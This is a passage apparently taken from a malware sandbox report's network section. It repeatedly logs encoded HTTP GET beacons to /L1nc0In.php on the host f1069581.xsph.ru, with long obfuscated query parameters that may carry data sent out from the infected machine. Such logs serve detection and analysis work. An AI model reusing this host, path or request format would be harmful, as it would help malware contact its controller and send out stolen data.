lJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDl